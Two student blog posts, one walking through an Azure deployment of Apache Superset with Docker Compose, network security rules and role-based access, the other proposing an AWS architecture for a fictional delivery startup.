Forem: Luis Faria

Deploying Apache Superset on Azure From Scratch: My CCF501 Assessment 3

Luis Faria — Thu, 30 Apr 2026 07:11:17 +0000

Assessment 1 taught me how to reason about cloud architecture. Assessment 3 forced me to put one on the wire - and prove it works.

The Jump From Diagrams to Reality

A couple of weeks ago I wrote my Cloud Computing Fundamentals (CCF501) Assessment 1, a 1,500-word architecture proposal for a fictional startup, full of NIST characteristics and Mermaid diagrams (read: CCF501 Assessment 1 write-up).

Assessment 3 was different. The brief gave me four tasks: resource group, virtual network, firewall, application - and asked me to actually do them on a real cloud, with real screenshots, on a public IP. No more reasoning about Auto Scaling: provision the VM, open the port and make the application return a 200.

This article is the deployment story documenting what I built, why I picked an open-source tool nobody else in my cohort was deploying, and the security and governance choices I had to defend with evidence instead of paragraphs.

Deployment architecture — single Azure Resource Group containing the VNet, NSG, VM, and the Superset / Postgres / Redis Docker stack.

Course Context: CCF501 in 12 Weeks

I'm doing my Master's in Software Engineering & AI (open-sourced repo with +1000 commits in ~1 year of work) at Torrens University Australia. CCF501 - Cloud Computing Fundamentals is one of the two subjects in my current term (T1-2026). The 12-week ride covers ground in this order:

Traditional vs modern computing
Cloud essentials (NIST 5)
Deployment models (public / private / hybrid)
Service models (IaaS / PaaS / SaaS)
Major providers (AWS / Azure / GCP)
Advanced cloud concepts (XaaS, hands-on AWS/Azure lab)
Public/private/hybrid trade-offs
Deployment case studies
Governance and legal obligations
Cloud security threats
Security policy planning
Implementation of security policy at various providers

The assessments mirror that arc. Assessment 1 (week 4): a technology report on cloud's contribution to business automation; Assessment 2 (week 8): a case study comparing deployment models; Assessment 3 (week 12): build something. The whole subject converges on one question: can you actually deploy and secure a real application?

In parallel, I'm taking ISY503 Intelligent Systems, and the more I sit with that coursework, the more obvious it gets that an ML model on a laptop helps nobody. Deployment is the work, and CCF501 makes that real.

Why Apache Superset (The Off-List Bet)

The brief suggested apps like Moodle, ThingsBoard, KaaIOT, or Jira, but I didn't pick any of them.

I picked Apache Superset - an open-source data exploration and visualisation platform originally built at Airbnb, now an Apache top-level project. SQL Lab, 40+ chart types, dashboards, role-based access control, connectors for everything from PostgreSQL to BigQuery to Snowflake.

4 reasons it was the right call for me:

Python-native. Python is my primary stack. Reading the source, debugging containers, extending it later, all roads stay on familiar ground.
RBAC depth. Superset ships with 3 meaningful roles out of the box (Admin / Alpha / Gamma). The assessment rubric weights security and governance at 20%, and rich RBAC writes that section for you instead of forcing it.
Career fit. I work as a Data Analyst at a school in Sydney, building SQL pipelines and reports. Superset is the cloud-deployed version of that exact work, and it feeds directly into my T4 subject BDA601 Big Data & Analytics in T2-2026. The deployment becomes infrastructure for the next subject, not a throwaway.
Differentiation. Nobody else in the cohort is deploying Superset. Off-list choice → harder to defend → deeper learning → stronger portfolio piece.

I considered Metabase (simpler, faster) and MLflow (better long-term MLOps story). Both are legit. Superset won because the trade-off (slightly higher complexity in exchange for a richer governance story and a Python-aligned platform) was the one I wanted to make. See my brainstorm notes here.

The Architecture

The whole thing lives in a single Azure Resource Group (rg-superset-ccf501) in Australia East. One VNet, one subnet, one NSG, one VM. Superset, PostgreSQL 15, and Redis 7 run as 3 containers via Docker Compose on the VM.

VM size landed on Standard_B2als_v2 (2 vCPUs, 4 GiB RAM), because the free-tier B1s (1 vCPU, 1 GiB RAM) does not have enough memory to reliably run the full Superset + PostgreSQL + Redis stack.

I spun up the VM only when capturing evidence, then immediately stopped and deallocated it. According to the Azure Retail Prices API (checked 30 April 2026), the Standard_B2als_v2 in Australia East costs roughly US$0.0475 per hour (compute only).

Window	Rough compute cost
4 hours (one capture session)	~US$0.19
48 hours (two-day evidence window)	~US$2.28
730 hours (left running for a full month)	~US$34.68

This reinforced a key practical lesson: cloud resources are cheap when deliberately managed, and surprisingly expensive when forgotten.
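The figures in the table follow directly from the quoted hourly rate. A minimal sketch of that arithmetic, assuming compute-only billing at a flat US$0.0475 per hour (disk, public IP, and egress are not included, and `compute_cost` is a name made up for this example):

```python
from decimal import Decimal, ROUND_HALF_UP

# Hourly compute rate quoted in the article (USD, Standard_B2als_v2, Australia East).
HOURLY_RATE_USD = Decimal("0.0475")


def compute_cost(hours: int, rate: Decimal = HOURLY_RATE_USD) -> Decimal:
    """Return the compute-only cost in USD, rounded half-up to whole cents."""
    return (rate * hours).quantize(Decimal("0.01"), rounding=ROUND_HALF_UP)


# The three windows from the table: one session, two days, a forgotten month.
for label, hours in [("capture session", 4), ("two-day window", 48), ("full month", 730)]:
    print(f"{label:>16}: {hours:>3} h -> ~US${compute_cost(hours)}")
```

Decimal arithmetic is used here so that the half-cent case (730 hours) rounds the same way the table does.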

Azure VM supersetluisccf501 — Ubuntu 22.04, Standard_B2als_v2, public IP attached, running state visible in the portal.

Why IaaS, Not PaaS?

I could have used Azure Container Instances, App Service for Containers, or AKS. I chose IaaS because the assessment was explicitly about provisioning a VM, VNet, firewall policy, and application stack. The trade-off was more operational responsibility, but more visibility into the cloud fundamentals the subject was assessing.

Option	Service model	What's managed for you	Why I didn't pick it (this assessment)
Azure Container Instances	Serverless containers	Hosts, OS, scaling	Hides the VNet/NSG/VM layer the rubric was testing
App Service for Containers	PaaS (managed runtime)	OS, runtime, TLS, autoscaling	Geared at single-container web apps; awkward for a 3-container Superset/Postgres/Redis stack
AKS	Managed Kubernetes	Control plane, node patching	Operational overkill for one short-lived demo
VM + Docker Compose (chosen)	IaaS	Hardware only	Forces every NIST and security decision into view

PaaS would have hidden the things CCF501 was teaching me to see. For real production work — long-running, multi-tenant, money on the line — App Service for Containers or AKS would be the better answer.

From-Scratch Deployment

I deployed Apache Superset 6.0.0 (the latest stable version at the start of the assessment in April 2026). The stack was pinned to this version for stability during evidence capture.

The 5 steps to get Superset running on Azure, with the security and governance layers in place:

Tip: As of April 2026, Azure still offers a free tier with limited resources: enough for an evaluation VM, but not enough to host the full Superset stack on the free B1s size.

1. Provision Azure infrastructure

In the Azure portal:

Create resource group rg-superset-ccf501 in Australia East.
Add VNet vnet-superset (10.0.0.0/16) with subnet snet-app (10.0.1.0/24).
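Attach NSG nsg-superset with two custom allow rules; Azure's built-in DenyAllInBound default rule (priority 65500) catches everything else:

Priority	Name	Port	Source	Action
100	Allow-SSH	22	My IP/32	Allow
110	Allow-Superset	8088	Any	Allow
65500	DenyAllInBound (default)	*	*	Deny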

Important note: In a production environment, never expose port 8088 to Any (0.0.0.0/0). For a real deployment I'd restrict this rule to a specific IP range or, better, place an Azure Application Gateway or Front Door with WAF in front of the VM and remove the VM's public IP entirely. This broad allow rule was used only because the deployment was extremely short-lived (demo data only, deallocated immediately after screenshots).

Launch a Linux VM (Standard_B2als_v2, Ubuntu 22.04 LTS) inside snet-app and attach a public IP.

Tip: The NSG rules are the first line of defence. Deny-all by default means every open port has to earn its place — SSH on 22 (locked to my single IP) and 8088 for Superset. Opening 8088 to Any on a public IP is not something I'd do for real data: it exposes the Superset login screen to the internet, and without TLS the credentials cross the wire in plaintext. This was only acceptable here because the VM was short-lived and served demo CSVs only. No port 80, no port 443; TLS is queued up for v2.
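The NSG table in this step can be read as a first-match evaluation: rules are processed in ascending priority order and the first rule that matches decides the outcome. The sketch below models that logic under simplifying assumptions (inbound traffic only, one port per rule, no protocol or destination matching). `MY_IP` is a hypothetical documentation address, and the last rule stands in for Azure's built-in DenyAllInBound default.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional


@dataclass(frozen=True)
class Rule:
    priority: int          # lower number = evaluated first
    name: str
    port: Optional[int]    # None means "any port"
    source: str            # CIDR block the rule applies to
    allow: bool


MY_IP = "203.0.113.10"  # hypothetical admin IP (RFC 5737 documentation range)

RULES = [
    Rule(100, "Allow-SSH", 22, f"{MY_IP}/32", True),
    Rule(110, "Allow-Superset", 8088, "0.0.0.0/0", True),
    Rule(65500, "DenyAllInBound", None, "0.0.0.0/0", False),
]


def evaluate(rules, src_ip: str, dst_port: int) -> Rule:
    """Return the first rule, in priority order, that matches the packet."""
    for rule in sorted(rules, key=lambda r: r.priority):
        port_matches = rule.port is None or rule.port == dst_port
        source_matches = ip_address(src_ip) in ip_network(rule.source)
        if port_matches and source_matches:
            return rule
    raise LookupError("no rule matched")


# SSH from an unknown address falls through to the default deny.
decision = evaluate(RULES, "198.51.100.7", 22)
print(decision.name, "allow" if decision.allow else "deny")
```

Tightening the 8088 rule for production would only mean changing its `source` from `0.0.0.0/0` to a narrower CIDR block; the evaluation order stays the same.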

2. SSH in and install Docker

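sudo apt update && sudo apt upgrade -y
# On stock Ubuntu 22.04 the Compose plugin is packaged as docker-compose-v2;
# docker-compose-plugin is only available after adding Docker's own apt repository.
sudo apt install -y docker.io docker-compose-v2 git
sudo usermod -aG docker $USER   # allow the current user to run docker without sudo
newgrp docker                   # pick up the new group membership in this shell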

Tip: Docker encapsulates the application and its dependencies, so the same docker compose up works on Ubuntu, Amazon Linux, or a colleague's laptop. Reproducibility is the whole point.

3. Drop in the Docker Compose stack

A trimmed version of the working docker-compose.yml (real secrets removed; replace the placeholders with environment variables before you push this anywhere):

services:
  redis:
    image: redis:7-alpine
    networks: [superset-network]

  postgres:
    image: postgres:15-alpine
    environment:
      POSTGRES_DB: superset
      POSTGRES_USER: superset
      POSTGRES_PASSWORD: <db-password>
    volumes:
      - postgres-data:/var/lib/postgresql/data
    networks: [superset-network]

  superset:
    image: apache/superset:6.0.0
    depends_on: [postgres, redis]
    environment:
      SUPERSET_SECRET_KEY: <openssl-rand-base64-42>
      SUPERSET_METADATA_DB_URI: "postgresql+psycopg2://superset:<db-password>@postgres:5432/superset"
      REDIS_HOST: redis
      REDIS_PORT: "6379"
    ports: ["8088:8088"]
    volumes:
      - ./superset_home:/app/superset_home
      - ./config.py:/app/pythonpath/superset_config.py:ro
    networks: [superset-network]

volumes:
  redis-data:
  postgres-data:

networks:
  superset-network:
    driver: bridge

# config.py
import os

SECRET_KEY = os.environ["SUPERSET_SECRET_KEY"]
SQLALCHEMY_DATABASE_URI = os.environ["SUPERSET_METADATA_DB_URI"]

CACHE_CONFIG = {
    "CACHE_TYPE": "RedisCache",
    "CACHE_DEFAULT_TIMEOUT": 300,
    "CACHE_KEY_PREFIX": "superset_",
    "CACHE_REDIS_HOST": os.environ.get("REDIS_HOST", "redis"),
    "CACHE_REDIS_PORT": int(os.environ.get("REDIS_PORT", "6379")),
    "CACHE_REDIS_DB": 1,
}

DATA_CACHE_CONFIG = CACHE_CONFIG

The config.py mount wires Superset to Redis as its cache backend and reads the Postgres URI from the environment. Generate the secret with openssl rand -base64 42, and never commit the real value.
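If openssl is not at hand, the same kind of key can be produced from Python's standard library. This is a minimal sketch, assuming a 42-byte random value encoded as Base64 is what the secret needs to be; `generate_secret_key` is a name made up for this example.

```python
import base64
import secrets


def generate_secret_key(num_bytes: int = 42) -> str:
    """Return num_bytes of cryptographically strong randomness, Base64-encoded."""
    return base64.b64encode(secrets.token_bytes(num_bytes)).decode("ascii")


# Print once, copy into the environment (not into the repo).
print(generate_secret_key())
```

The output is meant to be exported as SUPERSET_SECRET_KEY on the VM, the same variable the compose file and config.py already read.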

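Tip: depends_on starts Postgres and Redis before the Superset container, but in this short form it only orders start-up; it does not wait for either service to be ready to accept connections. The ports line publishes container port 8088 on the VM's network interface, and the NSG rule from step 1 is what makes it reachable from a browser through the public IP.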

4. Bring it up and validate

docker compose up -d
docker compose logs -f superset   # wait for "Listening at: http://0.0.0.0:8088"
curl -I http://localhost:8088     # expect: HTTP/1.1 302 FOUND

Then open the Azure VM's public IP on port 8088 (http://<public-ip>:8088) in a browser, and the Superset login screen renders.

Apache Superset login page rendered through http://<public-ip>:8088 — proof the application is reachable end-to-end.

Tip: curl -I is the cheapest health check there is. A 302 FOUND is the right answer — Superset redirects unauthenticated requests to its login page.
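The same check can be scripted. Below is a rough Python counterpart to curl -I, assuming plain HTTP (there is no TLS in this v1 setup) and treating any 2xx or 3xx status as "the app is answering". `head_status` and `is_healthy` are names invented for this sketch.

```python
import http.client
from urllib.parse import urlsplit


def head_status(url: str, timeout: float = 5.0) -> int:
    """Send one HEAD request and return the status code without following redirects."""
    parts = urlsplit(url)
    conn = http.client.HTTPConnection(parts.hostname, parts.port or 80, timeout=timeout)
    try:
        conn.request("HEAD", parts.path or "/")
        return conn.getresponse().status
    finally:
        conn.close()


def is_healthy(status: int) -> bool:
    """Treat success and redirect codes as healthy; 4xx and 5xx are not."""
    return 200 <= status < 400
```

On the VM, `is_healthy(head_status("http://localhost:8088"))` should come back true once the container is listening, since the 302 to the login page counts as healthy.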

5. Use the application

This is the step that turns "the server responded" into "the application works": upload three CSVs, build a real dashboard, and configure the three RBAC roles.

The sample datasets I used (data here):

cloud_costs_demo.csv — Azure cost by service / environment.
superset_usage_demo.csv — Superset activity by user role.
security_events_demo.csv — security events by control layer.

Three charts: a bar chart of Azure cost by service, a line chart of Superset usage by role over time, and a stacked bar of security events by control layer. Then create three users: admin (Admin), analyst (Alpha), viewer (Gamma), and confirm each one sees only what their role allows.

Working dashboard combining Azure cost by service, Superset usage by role, and security events by control layer — proof the app ingests data and renders charts, not just that the server returned 200.

Tip: This is where Superset's RBAC earns its keep. Admin sees everything. Alpha (analyst) creates and edits dashboards but can't manage users. Gamma (viewer) only sees what's been published.

Security and Governance: Defence in Layers

Cloud security is a stack of decisions, each one narrowing the attack surface a little more.

Network layer (NSG):

Deny-all default inbound. Two explicit allows: SSH on port 22 (source-restricted to my IP only) and Superset on port 8088. No port 80, no port 443: TLS is intentionally out of scope for v1 and called out as an improvement (more below). The point is that every open port must have a reason.

OS layer:

SSH key-based authentication only. Password auth disabled in /etc/ssh/sshd_config. The IP allowlist on port 22 already limits exposure; key-only auth means even an exposed port won't fall to a brute-force password attack.

Application layer (Superset RBAC):

Role	What they can do	Who gets it
Admin	Full control: users, databases, all dashboards	System administrator
Alpha	Access all data sources, create/edit own charts and dashboards (SQL Lab needs the additional sql_lab role)	Data analyst
Gamma	View dashboards only, no edit access	Business viewer

This is where Superset earns its keep over a simpler tool. The 20% governance criterion stops being theoretical when you can show three actual users, three actual permission sets, and three different views of the same dashboard.
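The three-role split can be pictured as a plain role-to-permission lookup. The sketch below is a deliberately simplified model, not Superset's actual permission system: the permission names are hypothetical labels chosen for illustration, while the user names match the three accounts created in step 5.

```python
# Hypothetical permission labels; Superset's real permission strings differ.
ROLE_PERMISSIONS = {
    "Admin": {"manage_users", "manage_databases", "edit_dashboards", "view_dashboards"},
    "Alpha": {"edit_dashboards", "view_dashboards"},
    "Gamma": {"view_dashboards"},
}

# The three demo accounts and the role each one is bound to.
USER_ROLES = {"admin": "Admin", "analyst": "Alpha", "viewer": "Gamma"}


def can(user: str, permission: str) -> bool:
    """Return True if the user's role grants the permission; unknown users get nothing."""
    role = USER_ROLES.get(user)
    return permission in ROLE_PERMISSIONS.get(role, set())


for user in USER_ROLES:
    print(user, "can edit dashboards:", can(user, "edit_dashboards"))
```

The useful property is the default: a user or role that is not listed gets an empty permission set, which mirrors the deny-by-default stance of the network layer.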

Credential layer:

The Superset secret key, the Postgres password, and the admin password all live in environment variables, never hardcoded, never committed to the repo. The version of docker-compose.yml checked into the project uses placeholders.
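One way to catch a forgotten placeholder before the stack starts is a small pre-flight check. This is a sketch under assumptions: it looks only at the two variables that config.py reads, and it uses a crude heuristic (angle brackets around text) to spot values like <db-password> that were never replaced. `missing_or_placeholder` is a hypothetical helper, not part of Superset.

```python
import os

REQUIRED_VARS = ("SUPERSET_SECRET_KEY", "SUPERSET_METADATA_DB_URI")


def missing_or_placeholder(env=None, required=REQUIRED_VARS):
    """Return the names of required variables that are unset, empty, or still placeholders."""
    env = os.environ if env is None else env
    problems = []
    for name in required:
        value = env.get(name, "")
        # Heuristic only: a real secret containing both "<" and ">" would be flagged too.
        looks_like_placeholder = "<" in value and ">" in value
        if not value or looks_like_placeholder:
            problems.append(name)
    return problems


# Example with an explicit mapping instead of the real environment.
sample = {"SUPERSET_SECRET_KEY": "<openssl-rand-base64-42>"}
print(missing_or_placeholder(sample))
```

Run against the real environment (no argument), an empty list means both values are present and look like real secrets.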

Superset RBAC users page — three accounts (admin, analyst, viewer) bound to the three out-of-the-box roles, evidencing the governance layer.

The honest gap — and only acceptable for this context:

No TLS in v1. Opening 8088 to Any on a public IP is not something I would do for real data. It exposes the Superset login screen to the internet, and without TLS the login flow travels over plaintext HTTP. Superset can become a gateway to queryable datasets, so this was only acceptable here because the VM was short-lived, used demo CSVs, and was deallocated after evidence capture.

For anything touching real business or school data, the production-grade next step is mandatory: Azure Application Gateway or an nginx reverse proxy with Let's Encrypt for TLS, the public IP pulled in behind Front Door or a WAF, and the Superset container itself moved off a public-internet-exposed port — already called out explicitly in the report's robustness section.

Other production improvements queued up: Azure Database for PostgreSQL instead of a containerised Postgres (automated backups, HA), Celery workers off the Redis broker for long async queries (the Konquista pattern I built before with Django + Celery + Redis), Azure Monitor for alerts before the VM falls over.

AWS Portability Note

After the Azure deployment was finished, I ran the same stack on AWS (Amazon Web Services) EC2 / Amazon Linux 2023 to test how portable the architecture really was. Same VPC + Security Group + EC2 + Docker Compose pattern with the same three-container stack and the same RBAC.

Three things bit me on AWS that did not bite on Azure:

Amazon Linux 2023 is RPM-based, not Debian. apt update fails. Switch to dnf.
The Docker Compose plugin isn't bundled in the default docker package on AL2023, and there's no docker-compose-plugin in the AL2023 repo either. docker compose up returns "command not found." Install the official plugin into Docker's CLI plugins directory:

   sudo mkdir -p /usr/libexec/docker/cli-plugins
   sudo curl -SL "https://github.com/docker/compose/releases/latest/download/docker-compose-linux-x86_64" \
     -o /usr/libexec/docker/cli-plugins/docker-compose
   sudo chmod +x /usr/libexec/docker/cli-plugins/docker-compose
   docker compose version

My university's ISP silently blocks outbound port 8088. The Security Group was open. Curl on the VM returned 302. The browser timed out. Fix: an SSH tunnel through port 22, which that network (like most) allows:

   ssh -i ~/Downloads/your-key.pem -L 8088:localhost:8088 ec2-user@<public-ip> -N

Then http://localhost:8088 in the browser. Port 22 carries it.
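A quick TCP probe from the client side would have shortened that debugging hour: if port 22 connects and 8088 times out while curl on the VM succeeds, the block sits somewhere on the network path. A minimal sketch, assuming a plain TCP connect is a good enough signal (`port_reachable` is a name made up here):

```python
import socket


def port_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False
```

Calling it for ports 22 and 8088 against the instance's public IP from the laptop separates "the app is down" from "the network is filtering this port".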

That third one cost an extra hour of debugging, and produced one of the term's most useful lessons. Azure is the main story. The AWS variant proves portability and logs the pitfalls — both implementations live in the repo.

docker ps on the Azure VM — Apache Superset, PostgreSQL 15, and Redis 7 all in Up state, the container-level proof that the Compose stack is healthy.

What This Term Taught Me

Three things I'm taking forward:

Architecture diagrams are useful, but deployment is honest. Cloud theory let me draw a clean architecture in Mermaid. Deployment exposed the trade-offs that don't show up in a diagram: VM RAM ceilings, Compose plugin differences across distros, ISPs that filter non-standard ports, and the gap between "the server is up" and "the application is usable."

Tip: Mermaid Live Editor is the open-source tool I used for every diagram in this article — flowcharts, sequence diagrams, the lot. The syntax is plain text, and the output drops straight into Markdown.

Cloud security is layered, not bolted on. Network, OS, application, credentials — each one is a decision. Skip any layer and the attack surface widens. The exercise of justifying every open port has been more useful than memorising the OWASP Top 10.
Open-source analytics tools are excellent portfolio projects. They sit at the intersection of infrastructure (deployment), data (connections, datasets), security (RBAC), and usability (dashboards that real people read). One project, four learning surfaces.

And a practical one: stop and deallocate cloud resources the moment you finish capturing evidence. Free credits run out faster than you expect when you forget that a B2als_v2 VM is metered by the second.

Building in Public

Studying for a Master's while working a 9-5 job means assignments stop being abstract: the same patterns - IaaS, NSGs, RBAC, deny-by-default firewalls, env-var secrets - show up at work the same week I learn them. I'm sharing this publicly because the learning compounds when it's open.

Assessment Brief - CCF501 Assessment 3
Deployment notes + technical artifacts
AWS variant - pitfall log included
CCF501 Assessment 1 article - the architecture-design predecessor to this one
Assessment 1 submission
Assessment 2 submission
Assessment 3 submission covering the case in granular detail.

If you're deploying something open-source on a cloud provider for the first time, what surprised you most: the infrastructure, the security choices, or the network getting in your way?

Let's Connect

LinkedIn: linkedin.com/in/lfariabr
GitHub: github.com/lfariabr
Portfolio: luisfaria.dev

References

Apache Software Foundation. (n.d.). Apache Superset documentation. https://superset.apache.org/docs/intro

IBM. (n.d.). SaaS, PaaS, IaaS explained. https://www.ibm.com/think/topics/iaas-paas-saas

Mell, P., & Grance, T. (2011). The NIST definition of cloud computing (Special Publication 800-145). National Institute of Standards and Technology. https://doi.org/10.6028/NIST.SP.800-145

Microsoft. (n.d.-a). Azure Virtual Network documentation. Microsoft Learn. https://learn.microsoft.com/en-us/azure/virtual-network/

Microsoft. (n.d.-b). Network security groups overview. Microsoft Learn. https://learn.microsoft.com/en-us/azure/virtual-network/network-security-groups-overview

Microsoft. (n.d.-c). Create your Azure free account today. https://azure.microsoft.com/en-au/free/

Sandhu, R. S., Coyne, E. J., Feinstein, H. L., & Youman, C. E. (1996). Role-based access control models. Computer, 29(2), 38–47. https://doi.org/10.1109/2.485845

Designing a Cloud Architecture from Scratch: My CCF501 Assessment 1

Luis Faria — Mon, 16 Mar 2026 00:38:15 +0000

AWS gives you 200+ services. My Master's assignment asked me to pick the right ones - and justify every decision.

The Challenge

This term I'm studying Cloud Computing Fundamentals (CCF501) at Torrens University Australia. Assessment 1 was a design challenge: propose a secure, scalable cloud architecture for ABC Enterprises - a fictional delivery and payments startup modernising its entire IT infrastructure.

The case study numbers set the stakes:

~80% reduction in start-up IT costs after moving to cloud
10x customer surge absorbed in a single month, with no additional headcount

No recipe given. Just requirements, a blank canvas, and a word count.

This article is the full breakdown behind the LinkedIn post I shared - the reasoning, the trade-offs, and what the exercise actually taught me.

Why Cloud? (And Why Not On-Premises)

Traditional IT means owning servers, cooling, and the staff to keep it all running. For a high-growth startup like ABC, that model is a strategic liability. You buy capacity for a projected peak, sit on idle hardware during troughs, and wait weeks for procurement when demand surges beyond forecast.

Cloud flips the model: rent capability, not hardware. The NIST definition nails it with five characteristics:

NIST Characteristic	What It Means for ABC
On-Demand Self-Service	Dev team spins up EC2 and RDS via console - no vendor call required
Broad Network Access	App accessible via mobile and browser across delivery, taxi, and payments verticals
Resource Pooling	ABC shares AWS physical hardware; workloads logically isolated per tenant via VPC
Rapid Elasticity	10x surge absorbed automatically - no procurement delay, no manual intervention
Measured Service	~80% reduction in start-up IT costs - pay only for compute-hours and GB-months consumed

Three Benefits That Mattered for ABC

1. Cost Efficiency: CAPEX to OPEX

Cloud shifts spend from capital expenditure (hardware you buy) to operational expenditure (capacity you consume). The ~80% reduction in start-up IT costs is the measured service characteristic in action. As workloads grow, standard operations - backups, patching, scaling - get codified and automated, reducing human toil across the pipeline.

2. Rapid Scalability Without Procurement

A 10x customer surge in a single month exposes the core weakness of on-premises: procurement lead times mean hardware arrives after the opportunity has passed. EC2 Auto Scaling provisions or terminates instances based on CloudWatch signals - capacity becomes policy-driven, not operator-driven.
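"Policy-driven" capacity can be made concrete with a proportional scaling rule. The sketch below is a simplified illustration, not the algorithm AWS Auto Scaling actually runs: it scales the fleet so that a per-instance metric returns to its target, then clamps the result to the group's limits. The default limits of 2 and 20 instances mirror the baseline and ceiling in the services table; the metric and target values are hypothetical.

```python
import math


def desired_capacity(current: int, metric_value: float, target_value: float,
                     min_size: int = 2, max_size: int = 20) -> int:
    """Scale the fleet proportionally to metric/target, clamped to [min_size, max_size]."""
    if current < 1 or target_value <= 0:
        raise ValueError("current must be >= 1 and target_value must be > 0")
    proposed = math.ceil(current * metric_value / target_value)
    return max(min_size, min(max_size, proposed))


# Hypothetical 10x surge: each of 2 instances sees 10,000 requests/min against a 1,000 target.
print(desired_capacity(current=2, metric_value=10_000, target_value=1_000))
```

The clamp is the part that matters for cost control: the policy can react to a surge on its own, but never beyond the ceiling someone chose deliberately.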

3. Reduced IT Management Overhead

In on-premises environments, more customers means more infrastructure and more staff to maintain it. Cloud breaks that linear relationship. Through resource pooling, providers consolidate physical resources across tenants, letting ABC gain resilient architectures that would be expensive to replicate in-house.

The Architecture

I chose AWS - partly because Route 53 was already in the described stack, and partly because the managed-service breadth made every design decision straightforward to defend.

Here's how the stack layers together:

Route 53: DNS layer, the front door. Handles routing and health checks at the DNS level.
Elastic Load Balancer (ELB): distributes inbound traffic across EC2 instances, runs health checks before requests hit compute, integrates natively with Auto Scaling.
EC2 + Auto Scaling: horizontally scalable compute. Provisions or terminates instances on demand signals. Absorbed the 10x surge with zero manual intervention.
S3: object storage for assets, backups, and static content. Pay-per-GB, no provisioned minimum, practically unlimited ceiling.
RDS: managed relational database (PostgreSQL). Removes operational overhead of running your own DB server. Multi-AZ for resilience, read replicas on demand.
Lambda: event-driven compute for workflow automation: order placed → delivery assigned; payment confirmed → restaurant notified. Scales to zero when idle, charges only per invocation.

The traffic flow looks like this:

[Diagram: traffic flow]

And the high-level architecture:

[Diagram: high-level architecture]

The Three Challenges (and How to Mitigate Them)

Cloud adoption is not risk-free. Three challenges are most relevant for ABC:

1. Security and Privacy

ABC handles payments and customer PII. Security is the top concern for cloud adopters - 90% of security professionals cite it as a challenge. Mitigation isn't a single switch; it's a cascade:

IAM least-privilege policies - nothing gets more access than it needs
Mandatory MFA on all console and API access
Encryption at rest and in transit across S3, RDS, and Lambda
Security groups on EC2 as a network firewall layer
AWS WAF + Shield Standard at the perimeter

The shared responsibility model is the mental model here: AWS secures the infrastructure, ABC secures what runs on it.

2. Cost Volatility

Pay-as-you-go can spiral without guardrails - overprovisioned instances and excessive egress generate surprise bills. Mitigation: FinOps habits from day one. Budget alerts, resource tagging, rightsizing, and reserved pricing for stable workloads.

3. Vendor Lock-in and Skills Gap

Deeper managed-service adoption makes provider migration expensive. Mitigation: prioritize portability (containers, standard databases) and invest in targeted upskilling. The skills gap is a real cost that rarely appears in TCO calculations.

Deployment and Service Model

Why Public Cloud

Deployment Model	Cost	Elasticity	ABC Fit
Public Cloud	Low - OPEX only	High - Auto Scaling	✅ Recommended
Private Cloud	High - CAPEX + ops staff	Limited - fixed capacity	❌ Over-engineered for a startup
Hybrid Cloud	Medium - dual infrastructure	Moderate - complex to manage	⚠️ Premature for current maturity

Public cloud is the clear fit. IBM reports IaaS workloads experience 60% fewer security incidents than traditional data centres - so "private = more secure" is a myth worth dispelling.

Why IaaS + PaaS (Not SaaS)

Cloud service models sit on a control-versus-responsibility spectrum. IaaS gives compute flexibility. PaaS abstracts infrastructure so the team can focus on development. SaaS offers limited customisation - less suited to a startup that must differentiate its platform.

Recommendation: Blend IaaS (EC2 for compute flexibility) with PaaS (RDS and Lambda as managed services). Add a VPC for network isolation as the platform matures.

Cost Model

Three levers exist:

Pay-as-you-go: maximum flexibility, highest unit price
Reserved/committed pricing: discounts of 30–60% for baseline commitments
Spot/preemptible: deep discounts for interruption-tolerant workloads

Recommendation: A hybrid cost model - reserved capacity for stable customer-facing tiers (web/app, databases), pay-as-you-go autoscaling for demand spikes, and spot instances for background jobs and analytics pipelines.
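To see how the three levers combine, here is a small worked model. Every number passed to it is a hypothetical input chosen for illustration (the hourly rate, the 40% reserved discount picked from inside the 30-60% range above, and the 70% spot discount); none of them are AWS prices.

```python
def monthly_cost(baseline_instances: int, burst_hours: float, batch_hours: float,
                 on_demand_rate: float, reserved_discount: float,
                 spot_discount: float, hours_in_month: int = 730) -> dict:
    """Split a month's compute bill across reserved, on-demand, and spot capacity."""
    reserved = baseline_instances * hours_in_month * on_demand_rate * (1 - reserved_discount)
    on_demand = burst_hours * on_demand_rate
    spot = batch_hours * on_demand_rate * (1 - spot_discount)
    return {
        "reserved": reserved,
        "on_demand": on_demand,
        "spot": spot,
        "total": reserved + on_demand + spot,
    }


# Hypothetical month: 2 always-on instances, 300 burst instance-hours, 200 batch instance-hours.
blended = monthly_cost(2, 300, 200, on_demand_rate=0.10,
                       reserved_discount=0.40, spot_discount=0.70)
all_on_demand = (2 * 730 + 300 + 200) * 0.10
print(f"blended: {blended['total']:.2f}  vs  all on-demand: {all_on_demand:.2f}")
```

The point of the comparison is the shape, not the figures: the reserved tier dominates the bill, so the size of the always-on baseline is the decision that moves the total most.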

Cloud adoption is rarely about the cheapest bill. It's about better ROI: less downtime, faster launches, and automation that avoids linear headcount growth.

Why AWS Over Azure or GCP

Provider	Ecosystem Fit	Load Balancing	Serverless	ABC Alignment
AWS	Broadest managed-service catalogue	ELB - native Route 53 integration	Lambda - event-driven, zero idle cost	✅ Best fit - Route 53 already in stack
Azure	Microsoft / enterprise-aligned	Application Gateway - extra config	Azure Functions - separate ecosystem	⚠️ No Microsoft signals in ABC
GCP	Analytics and ML-first	Cloud Load Balancing - GKE-oriented	Cloud Run / Functions - container-first	❌ No analytics-heavy workloads yet

The Route 53 signal was decisive. It's not just familiarity - it means the DNS and load balancing layers integrate natively, reducing configuration surface area and failure points.

What the Exercise Actually Taught Me

The biggest insight wasn't choosing between AWS services. It was understanding why you layer them the way you do.

Security is not a layer you add at the end. It lives at every tier:

DNS filtering at Route 53
Traffic rules at the load balancer
Security groups on EC2
IAM policies on S3 and Lambda
Encryption at the data layer

Similarly, scalability isn't one Auto Scaling policy. It's a cascade: DNS health checks → load balancer distribution → compute elasticity → database read replicas. Each layer has to be designed to hand off load gracefully to the next.

The other thing I'll carry forward: reserved instances vs on-demand pricing is an architectural decision, not just a finance conversation. What you commit to reserved shapes what you build around it.

Full Services Provisioned

AWS Service	Role	Baseline Config	Scale Ceiling
EC2 (web/app tier)	Serve API requests	2× t3.medium	20× c5.xlarge
Auto Scaling	Scale EC2 fleet on demand	Policy-driven (CloudWatch)	Absorbed 10x surge, zero manual intervention
